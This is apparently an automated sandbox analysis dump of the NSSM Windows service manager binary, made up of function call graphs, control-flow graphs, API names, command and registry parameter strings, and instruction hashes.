API calls 14155->14156 14156->14155 14158 14001e601 14157->14158 14159 14001e614 14157->14159 14160 14001a218 _errno 45 API calls 14158->14160 14161 14001e6ca 14159->14161 14164 14001e628 14159->14164 14163 14001e606 14160->14163 14162 14001a218 _errno 45 API calls 14161->14162 14165 14001e6cf 14162->14165 14163->14142 14166 14001e673 14164->14166 14167 14001e64e 14164->14167 14168 14001a148 _flush 7 API calls 14165->14168 14170 14001d394 _flush 46 API calls 14166->14170 14169 14001a218 _errno 45 API calls 14167->14169 14168->14163 14172 14001e653 14169->14172 14171 14001e67a 14170->14171 14173 14001e6af 14171->14173 14175 14001d310 _close_nolock 45 API calls 14171->14175 14174 14001a148 _flush 7 API calls 14172->14174 14176 14001a218 _errno 45 API calls 14173->14176 14174->14163 14177 14001e68d FlushFileBuffers 14175->14177 14178 14001e6b6 14176->14178 14179 14001e6a4 14177->14179 14180 14001e69a GetLastError 14177->14180 14184 14001d43c LeaveCriticalSection 14178->14184 14179->14178 14182 14001a238 __doserrno 45 API calls 14179->14182 14180->14179 14182->14173 14189 140020fc8 14190 140020fe4 14189->14190 14191 140020fda 14189->14191 14193 1400191e0 LeaveCriticalSection 14191->14193 14255 14001aad4 14256 14001aae1 14255->14256 14258 14001aaeb 14255->14258 14259 14001a8dc 14256->14259 14260 14001b004 _getptd 45 API calls 14259->14260 14261 14001a900 14260->14261 14262 14001a518 __initmbctable 45 API calls 14261->14262 14263 14001a908 14262->14263 14283 14001a5d4 14263->14283 14266 140018ca4 _getbuf 45 API calls 14267 14001a92c __initmbctable 14266->14267 14277 14001aa89 14267->14277 14290 14001a664 14267->14290 14270 14001a967 14273 140018e1c free 45 API calls 14270->14273 14274 14001a98c 14270->14274 14271 14001aa8b 14272 14001aaa4 14271->14272 14275 140018e1c free 45 API calls 14271->14275 14271->14277 14276 14001a218 _errno 45 API calls 14272->14276 14273->14274 14274->14277 14278 1400192e0 _lock 45 API calls 14274->14278 14275->14272 14276->14277 14277->14258 14279 14001a9c4 14278->14279 14280 14001aa74 14279->14280 14282 140018e1c free 45 API calls 14279->14282 14300 1400191e0 LeaveCriticalSection 14280->14300 14282->14280 14284 1400171e4 _Wcsftime 45 API calls 14283->14284 14285 14001a5e8 14284->14285 14286 14001a5f4 GetOEMCP 14285->14286 14287 14001a619 14285->14287 14289 14001a604 14286->14289 14288 14001a61e GetACP 14287->14288 14287->14289 14288->14289 14289->14266 14289->14277 14291 14001a5d4 __initmbctable 47 API calls 14290->14291 14292 14001a68b 14291->14292 14293 14001a693 __initmbctable 14292->14293 14294 14001a6e4 IsValidCodePage 14292->14294 14299 14001a70a __initmbctable 14292->14299 14295 140017480 write_char 8 API calls 14293->14295 14294->14293 14296 14001a6f5 GetCPInfo 14294->14296 14297 14001a8c7 14295->14297 14296->14293 14296->14299 14297->14270 14297->14271 14301 14001a334 GetCPInfo 14299->14301 14302 14001a462 14301->14302 14303 14001a376 __initmbctable 14301->14303 14306 140017480 write_char 8 API calls 14302->14306 14304 14001f558 __initmbctable 67 API calls 14303->14304 14305 14001a3f9 14304->14305 14311 14001f254 14305->14311 14308 14001a502 14306->14308 14308->14293 14310 14001f254 __initmbctable 78 API calls 14310->14302 14312 1400171e4 _Wcsftime 45 API calls 14311->14312 14313 14001f278 14312->14313 14316 14001ed14 14313->14316 14317 14001ed6c LCMapStringW 14316->14317 14320 14001ed90 14316->14320 14318 14001ed9c GetLastError 14317->14318 14317->14320 14318->14320 14319 14001f05e 14324 140020928 __initmbctable 67 API calls 14319->14324 14320->14319 14321 14001ee0b 14320->14321 14322 14001f057 14321->14322 14323 14001ee29 MultiByteToWideChar 14321->14323 14325 140017480 write_char 8 API calls 14322->14325 14323->14322 14333 14001ee58 14323->14333 14326 14001f08c 14324->14326 14327 14001a42c 14325->14327 14326->14322 14329 14001f1e7 LCMapStringA 14326->14329 14330 14001f0ab 14326->14330 14327->14310 14328 14001eed4 MultiByteToWideChar 14331 14001f049 14328->14331 14332 14001eefe LCMapStringW 14328->14332 14345 14001f0f3 14329->14345 14334 14002097c __initmbctable 60 API calls 14330->14334 14331->14322 14341 140018e1c free 45 API calls 14331->14341 14332->14331 14336 14001ef28 14332->14336 14337 14001ee89 _flush 14333->14337 14338 14001da14 malloc 45 API calls 14333->14338 14335 14001f0c3 14334->14335 14335->14322 14339 14001f0cb LCMapStringA 14335->14339 14342 14001ef33 14336->14342 14348 14001ef6e 14336->14348 14337->14322 14337->14328 14338->14337 14339->14345 14350 14001f0fa 14339->14350 14340 14001f217 14340->14322 14346 140018e1c free 45 API calls 14340->14346 14341->14322 14342->14331 14344 14001ef4a LCMapStringW 14342->14344 14343 140018e1c free 45 API calls 14343->14340 14344->14331 14345->14340 14345->14343 14346->14322 14347 14001efdb LCMapStringW 14351 14001effc WideCharToMultiByte 14347->14351 14352 14001f03b 14347->14352 14349 14001da14 malloc 45 API calls 14348->14349 14357 14001ef8c _flush 14348->14357 14349->14357 14354 14001f11b __initmbctable _flush 14350->14354 14355 14001da14 malloc 45 API calls 14350->14355 14351->14352 14352->14331 14356 140018e1c free 45 API calls 14352->14356 14353 14001f17d LCMapStringA 14358 14001f1a5 14353->14358 14359 14001f1a9 14353->14359 14354->14345 14354->14353 14355->14354 14356->14331 14357->14331 14357->14347 14358->14345 14362 140018e1c free 45 API calls 14358->14362 14361 14002097c __initmbctable 60 API calls 14359->14361 14361->14358 14362->14345 13498 140018e5c 13499 1400192e0 _lock 45 API calls 13498->13499 13503 140018e76 13499->13503 13500 140018eef 13519 1400191e0 LeaveCriticalSection 13500->13519 13503->13500 13504 140018eb6 DeleteCriticalSection 13503->13504 13507 14001dcdc 13503->13507 13506 140018e1c free 45 API calls 13504->13506 13506->13503 13508 14001dd21 13507->13508 13509 14001dcfd 13507->13509 13512 140016ce4 _vfwprintf_p 46 API calls 13508->13512 13513 14001dd1d 13508->13513 13510 14001a218 _errno 45 API calls 13509->13510 13511 14001dd02 13510->13511 13514 14001a148 _flush 7 API calls 13511->13514 13515 14001dd32 13512->13515 13513->13503 13514->13513 13520 14001dc50 13515->13520 13518 140016d74 _vfwprintf_p 2 API calls 13518->13513 13521 14001dc65 13520->13521 13522 14001dc88 13520->13522 13523 14001a218 _errno 45 API calls 13521->13523 13524 140018f0c _flush 77 API calls 13522->13524 13529 14001dc84 13522->13529 13525 14001dc6a 13523->13525 13526 14001dc93 13524->13526 13527 14001a148 _flush 7 API calls 13525->13527 13536 140020428 13526->13536 13527->13529 13529->13518 13531 14001864c _flush 45 API calls 13532 14001dca5 13531->13532 13540 140020310 13532->13540 13535 140018e1c free 45 API calls 13535->13529 13537 140020437 13536->13537 13538 14001dc9d 13536->13538 13537->13538 13539 140018e1c free 45 API calls 13537->13539 13538->13531 13539->13538 13541 14002034b 13540->13541 13542 14002032f 13540->13542 13543 1400203eb 13541->13543 13545 140020361 13541->13545 13544 14001a238 __doserrno 45 API calls 13542->13544 13546 14001a238 __doserrno 45 API calls 13543->13546 13547 140020334 13544->13547 13548 1400203b3 13545->13548 13549 140020388 13545->13549 13550 1400203f0 13546->13550 13551 14001a218 _errno 45 API calls 13547->13551 13554 14001d394 _flush 46 API calls 13548->13554 13552 14001a238 __doserrno 45 API calls 13549->13552 13553 14001a218 _errno 45 API calls 13550->13553 13555 14001dcac 13551->13555 13556 14002038d 13552->13556 13557 1400203f7 13553->13557 13558 1400203ba 13554->13558 13555->13529 13555->13535 13559 14001a218 _errno 45 API calls 13556->13559 13560 14001a148 _flush 7 API calls 13557->13560 13561 1400203d2 13558->13561 13562 1400203c7 13558->13562 13564 140020394 13559->13564 13560->13555 13563 14001a218 _errno 45 API calls 13561->13563 13569 140020254 13562->13569 13566 1400203ce 13563->13566 13567 14001a148 _flush 7 API calls 13564->13567 13584 14001d43c LeaveCriticalSection 13566->13584 13567->13555 13570 14001d310 _close_nolock 45 API calls 13569->13570 13573 140020268 13570->13573 13571 1400202c7 13585 14001d264 13571->13585 13573->13571 13574 1400202a4 13573->13574 13576 14001d310 _close_nolock 45 API calls 13573->13576 13574->13571 13577 14001d310 _close_nolock 45 API calls 13574->13577 13579 140020297 13576->13579 13580 1400202b0 CloseHandle 13577->13580 13578 1400202fe 13578->13566 13583 14001d310 _close_nolock 45 API calls 13579->13583 13580->13571 13581 1400202bd GetLastError 13580->13581 13581->13571 13582 14001a258 _close_nolock 45 API calls 13582->13578 13583->13574 13586 14001d277 13585->13586 13587 14001d2ea 13585->13587 13586->13587 13593 14001d2aa 13586->13593 13588 14001a218 _errno 45 API calls 13587->13588 13589 14001d2ef 13588->13589 13590 14001a238 __doserrno 45 API calls 13589->13590 13591 14001d2dc 13590->13591 13591->13578 13591->13582 13592 14001d2d4 SetStdHandle 13592->13591 13593->13591 13593->13592

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 219 14001dd54-14001dd97 call 140020f60 222 14001dd99-14001dd9b 219->222 223 14001dda0-14001dda3 219->223 226 14001e487-14001e4b1 call 140017480 222->226 224 14001ddd3-14001de04 223->224 225 14001dda5-14001ddc6 call 14001a238 call 14001a218 call 14001a148 223->225 229 14001de06-14001de0a 224->229 230 14001de0c-14001de13 224->230 244 14001ddcb-14001ddce 225->244 229->230 233 14001de15-14001de1b 229->233 230->225 230->233 235 14001de2a-14001de33 call 14001e920 233->235 236 14001de1d-14001de25 call 14001e6fc 233->236 242 14001e12a-14001e13b 235->242 243 14001de39-14001de4a 235->243 236->235 246 14001e141-14001e149 242->246 247 14001e40b-14001e427 WriteFile 242->247 243->242 245 14001de50-14001de80 call 14001b004 GetConsoleMode 243->245 244->226 245->242 258 14001de86-14001de88 245->258 251 14001e21f-14001e223 246->251 252 14001e14f-14001e152 246->252 249 14001e434-14001e43a GetLastError 247->249 250 14001e429-14001e42d 247->250 260 14001e441-14001e448 call 14001a258 249->260 250->249 254 14001e229-14001e22c 251->254 255 14001e2fd-14001e300 251->255 256 14001e454-14001e45e 252->256 257 14001e158 252->257 254->256 261 14001e232 254->261 255->256 259 14001e306 255->259 262 14001e46b-14001e47e call 14001a218 call 14001a238 256->262 263 14001e460-14001e465 256->263 264 14001e15b-14001e168 257->264 265 14001de93-14001dea7 GetConsoleCP 258->265 266 14001de8a-14001de8d 258->266 267 14001e30c-14001e311 259->267 260->244 269 14001e237-14001e244 261->269 262->244 263->222 263->262 270 14001e16a-14001e172 264->270 274 14001e124-14001e128 265->274 275 14001dead-14001deb2 265->275 266->242 266->265 273 14001e313-14001e31b 267->273 277 14001e246-14001e24e 269->277 278 14001e174-14001e17c 270->278 279 14001e19a-14001e1db WriteFile 270->279 285 14001e34b-14001e394 WideCharToMultiByte 273->285 286 14001e31d-14001e329 273->286 288 14001e0cb-14001e0cd 274->288 287 14001deb7-14001deba 275->287 289 14001e281-14001e2c2 WriteFile 277->289 290 14001e250-14001e25c 277->290 280 14001e189-14001e198 278->280 281 14001e17e-14001e186 278->281 283 14001e212-14001e21a GetLastError 279->283 284 14001e1dd-14001e1f4 279->284 280->270 280->279 281->280 296 14001e0bf-14001e0c5 283->296 295 14001e1fa-14001e207 284->295 284->296 301 14001e11a-14001e122 GetLastError 285->301 302 14001e39a 285->302 297 14001e337-14001e349 286->297 298 14001e32b-14001e333 286->298 299 14001e043-14001e047 287->299 300 14001dec0-14001dee3 287->300 291 14001e0d3-14001e0d6 288->291 292 14001e44d 288->292 289->283 293 14001e2c8-14001e2df 289->293 303 14001e25e-14001e269 290->303 304 14001e26d-14001e27f 290->304 291->260 309 14001e0dc-14001e0ee call 14001a218 call 14001a238 291->309 292->256 293->296 310 14001e2e5-14001e2f2 293->310 295->264 305 14001e20d 295->305 296->288 308 14001e483-14001e485 296->308 297->273 297->285 298->297 313 14001e049-14001e04d 299->313 314 14001e04f-14001e062 299->314 306 14001df05-14001df0f call 14001c440 300->306 307 14001dee5-14001df03 300->307 311 14001e0ba 301->311 312 14001e39c-14001e3d4 WriteFile 302->312 303->304 304->277 304->289 305->296 334 14001df11-14001df1e 306->334 335 14001df45-14001df4b 306->335 318 14001df4e-14001df5b call 14001ed04 307->318 308->226 309->244 310->269 317 14001e2f8 310->317 311->296 320 14001e3e1-14001e3e7 GetLastError 312->320 321 14001e3d6-14001e3dd 312->321 313->314 315 14001e066-14001e06a 313->315 314->315 323 14001e072-14001e081 call 140020460 315->323 324 14001e06c-14001e070 315->324 317->296 338 14001e0b6 318->338 342 14001df61-14001df9d WideCharToMultiByte 318->342 322 14001e3e9-14001e3ec 320->322 321->312 328 14001e3df 321->328 322->311 329 14001e3f2-14001e400 322->329 323->301 344 14001e087-14001e08d 323->344 324->323 330 14001e0a8-14001e0b0 324->330 328->322 329->267 336 14001e406 329->336 330->287 330->338 339 14001df24-14001df3a call 14001ed04 334->339 340 14001e0f3-14001e118 334->340 335->318 336->311 338->311 339->338 349 14001df40-14001df43 339->349 340->296 342->338 345 14001dfa3-14001dfd2 WriteFile 342->345 344->330 346 14001e08f-14001e096 call 140020460 344->346 345->301 348 14001dfd8-14001dfe5 345->348 352 14001e09b-14001e0a0 346->352 348->338 351 14001dfeb-14001dff3 348->351 349->342 351->330 353 14001dff9-14001e02e WriteFile 351->353 352->301 354 14001e0a2-14001e0a4 352->354 353->301 355 14001e034-14001e039 353->355 354->330 355->338 356 14001e03b-14001e041 355->356 356->330
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __doserrno_errno
                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                  • API String ID: 921712934-4171548499
                                                                                                                                                                                                                                  • Opcode ID: 44292d1e6635f8d60b3e668f6fcafa4615fa0934667bb88f64e6ed7b7bc47831
                                                                                                                                                                                                                                  • Instruction ID: aa0bf254f8f087adcbcaf3351be722ea0e464e66e42a71687ffdbb44a9319c33
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44292d1e6635f8d60b3e668f6fcafa4615fa0934667bb88f64e6ed7b7bc47831
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7012E33220468586EB228F66E4843EE77A0F78DBC4F54411AFB4A4B6B5DF7EC945CB10

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 357 14000c8f0-14000c945 call 140001b00 call 140016bd0 call 14001864c call 1400184f4 call 140016bd0 call 14001864c call 1400184f4 call 14000c600 call 14000aa50 376 14000c952-14000c95a 357->376 377 14000c947-14000c951 call 140018384 357->377 379 14000cc2f-14000cc42 TlsAlloc 376->379 380 14000c960-14000c972 call 14000c460 376->380 377->376 381 14000cc44 call 14000d7c0 379->381 382 14000cc49-14000cc57 GetStdHandle 379->382 392 14000c974-14000c989 call 140012af0 call 140018384 380->392 393 14000c98a-14000c99c call 14000c460 380->393 381->382 386 14000cce7-14000ccf8 call 14000c580 call 140018384 382->386 387 14000cc5d-14000cc8f StartServiceCtrlDispatcherW 382->387 389 14000cc91-14000cc9c GetLastError 387->389 390 14000ccdf-14000cce6 call 140018384 387->390 396 14000cc9e-14000ccaf call 14000c580 call 140018384 389->396 397 14000ccb0-14000ccde call 140006fa0 call 140007160 call 14000abf0 call 140018384 389->397 390->386 392->393 406 14000c9b7-14000c9c9 call 14000c460 393->406 407 14000c99e-14000c9b6 call 140012af0 call 140018384 393->407 396->397 397->390 423 14000c9cb-14000c9de call 140012af0 406->423 424 14000c9fe-14000ca10 call 14000c460 406->424 407->406 435 14000c9e8-14000c9fd call 140012af0 call 140018384 423->435 436 14000c9e0-14000c9e7 call 140018384 423->436 433 14000ca12-14000ca2a call 140012af0 call 140018384 424->433 434 14000ca2b-14000ca3d call 14000c460 424->434 433->434 445 14000ca58-14000ca6a call 14000c460 434->445 446 14000ca3f-14000ca57 call 140012af0 call 140018384 434->446 435->424 436->435 456 14000ca85-14000ca97 call 14000c460 445->456 457 14000ca6c-14000ca84 call 140012af0 call 140018384 445->457 446->445 463 14000cab2-14000cac4 call 14000c460 456->463 464 14000ca99-14000cab1 call 140012af0 call 140018384 456->464 457->456 472 14000cac6-14000cacd 463->472 473 14000cafb-14000cb0d call 14000c460 463->473 464->463 476 14000cae7-14000caf5 call 140013cf0 call 140018384 472->476 477 14000cacf-14000cae6 call 14000c6b0 call 140018384 472->477 482 14000cb13-14000cb25 call 14000c460 473->482 483 14000cbb4-14000cbc6 call 140011250 473->483 489 14000cafa 476->489 477->476 482->483 495 14000cb2b-14000cb3d call 14000c460 482->495 493 14000cbc8-14000cbcf 483->493 494 14000cbed-14000cbf2 483->494 489->473 493->494 496 14000cbd1-14000cbd3 493->496 498 14000cbf4 494->498 499 14000cc26-14000cc2e call 140018384 494->499 495->483 505 14000cb3f-14000cb51 call 14000c460 495->505 496->494 500 14000cbd5-14000cbec call 14000c6b0 call 140018384 496->500 502 14000cc00-14000cc24 498->502 499->379 500->494 502->499 502->502 505->483 512 14000cb53-14000cb65 call 14000c460 505->512 512->483 515 14000cb67-14000cb79 call 14000c460 512->515 515->379 518 14000cb7f-14000cb86 515->518 519 14000cb88-14000cb9f call 14000c6b0 call 140018384 518->519 520 14000cba0-14000cbb3 call 1400126b0 call 140018384 518->520 519->520 520->483
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process_errno$AllocConsoleFreeHeapWindow$AllocateCheckCtrlCurrentDispatcherErrorHandleInitializeLastMembershipServiceStartThreadToken
                                                                                                                                                                                                                                  • String ID: NSSM$continue$edit$get$install$pause$remove$reset$restart$rotate$set$start$status$stop$unset
                                                                                                                                                                                                                                  • API String ID: 1720597112-1322290842
                                                                                                                                                                                                                                  • Opcode ID: 695164e36344d25f54f984434701e8a2703b4eac74e5bd9b7443d56bdb33de6e
                                                                                                                                                                                                                                  • Instruction ID: 98038c19499aac26e045f1ecdbb77debcf1156b78e499f10a20a6217df0665d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 695164e36344d25f54f984434701e8a2703b4eac74e5bd9b7443d56bdb33de6e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65B1B6B071064642FB26E773E4A5BEE2251AB4D7C8F44042ABB1A4B9F7EF79C904C351

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FormatHeapMessage$AllocDefaultProcessUser_snwprintf_s
                                                                                                                                                                                                                                  • String ID: system error %lu
                                                                                                                                                                                                                                  • API String ID: 3536280399-1824642319
                                                                                                                                                                                                                                  • Opcode ID: 78a7c1ef7ec8e27d9b052412a811d606b309936d5e97b74fa377f6beecd46d43
                                                                                                                                                                                                                                  • Instruction ID: 80cdaa89c1789ea60c18415ff47a6bae602c94124b6623278abc98dd673ce9fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78a7c1ef7ec8e27d9b052412a811d606b309936d5e97b74fa377f6beecd46d43
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27118271604B4182E721DF66B444796B7A2FB887A4F404238EA9D43BE4DF3CC4948B00

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7b220d4862cebea2789e38450b184224a41a146bd7da7feee4018713bc38882e
                                                                                                                                                                                                                                  • Instruction ID: 3d88d937020a338644931f16aa56418a9820deec5ab43cde738b419d279493a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b220d4862cebea2789e38450b184224a41a146bd7da7feee4018713bc38882e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49417F71608A8096EB66DB62F4413DE73A0FB8CBC4F544025EB8E47BA6EF3CC5568700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                                                                                                                  • Opcode ID: 8e00b7c401c244c4d2dd9bea303fc4332e1901409c6ce85e42e247c014dde45a
                                                                                                                                                                                                                                  • Instruction ID: 171b0f787924deab90296a069f3fd90b71ce6111954c9d8469fae59a515beb17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e00b7c401c244c4d2dd9bea303fc4332e1901409c6ce85e42e247c014dde45a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A11F5726187848AE751CB6AF49438BBBE1F399788F44001AE7C987B69DB3DD408CF40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseDelete
                                                                                                                                                                                                                                  • String ID: AppAffinity$AppDirectory$AppEnvironment$AppEnvironmentExtra$AppNoConsole$AppParameters$AppPriority$AppRestartDelay$AppRotateBytes$AppRotateBytesHigh$AppRotateFiles$AppRotateOnline$AppRotateSeconds$AppStderr$AppStdin$AppStdout$AppStopMethodConsole$AppStopMethodSkip$AppStopMethodThreads$AppStopMethodWindow$AppThrottle$Application$CreationDisposition$FlagsAndAttributes$SYSTEM\CurrentControlSet\Services\%s\Parameters$ShareMode
                                                                                                                                                                                                                                  • API String ID: 453069226-1996066648
                                                                                                                                                                                                                                  • Opcode ID: 7bde24db42ff3c6d409aea4dd3232bd1f241e358b9dfca4cda3020c875f980cb
                                                                                                                                                                                                                                  • Instruction ID: 4d695d36c36787aa881c4940d04b60d5a76bd8c6f151872adbdeb3fe386b1392
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bde24db42ff3c6d409aea4dd3232bd1f241e358b9dfca4cda3020c875f980cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76325BF520078691FA67EB57F8407E92361BB4D7D8F84502ABF0A13AB99F38C948D711

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 529 140012780-140012793 530 1400127a2-1400127db 529->530 531 140012795-1400127a1 529->531 532 1400127dd-1400127e0 530->532 533 1400127f0 530->533 534 1400127e2-1400127e7 532->534 535 1400127e9-1400127ee 532->535 536 1400127f5-140012802 533->536 534->536 535->536 537 140012804-140012820 call 140016e78 536->537 538 140012825-14001283d 536->538 537->538 540 140012875-140012878 538->540 541 14001283f-140012858 call 1400015e0 538->541 542 14001287a-140012881 540->542 543 140012889-1400128a5 call 140001850 540->543 547 140012863-14001286a 541->547 548 14001285a-14001285e 541->548 542->543 552 140012959-140012968 call 1400018c0 543->552 553 1400128ab 543->553 547->543 551 14001286c-140012873 547->551 550 140012abe-140012ae6 548->550 551->543 555 1400128ae-140012900 ChangeServiceConfigW 552->555 559 14001296e-140012976 552->559 553->555 557 1400129b1-1400129b9 555->557 558 140012906-14001290e 555->558 562 1400129d4-1400129db 557->562 563 1400129bb-1400129ce GetProcessHeap HeapFree 557->563 560 140012929-14001294a GetLastError call 140006fa0 call 140016bd0 call 140007220 558->560 561 140012910-140012923 GetProcessHeap HeapFree 558->561 566 140012991-1400129ac call 140016bd0 call 140007220 559->566 567 140012978-14001298b GetProcessHeap HeapFree 559->567 580 14001294f-140012954 560->580 561->560 564 1400129fc-140012a07 562->564 565 1400129dd-1400129f6 call 140010380 562->565 563->562 570 140012a09-140012a0c 564->570 571 140012a0e-140012a19 call 140010af0 564->571 565->564 565->580 585 140012ab9 566->585 567->566 570->571 576 140012a1e-140012a4e ChangeServiceConfig2W 570->576 571->576 581 140012a80-140012a83 576->581 582 140012a50-140012a59 GetLastError 576->582 580->585 588 140012a85-140012a8c call 14000e900 581->588 589 140012ab7 581->589 582->581 586 140012a5b-140012a7b call 140006fa0 call 140007160 582->586 585->550 586->581 592 140012a91-140012a93 588->592 589->585 594 140012a95-140012aad call 140016bd0 call 140007220 592->594 595 140012aaf-140012ab2 call 140011db0 592->595 594->585 595->589
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
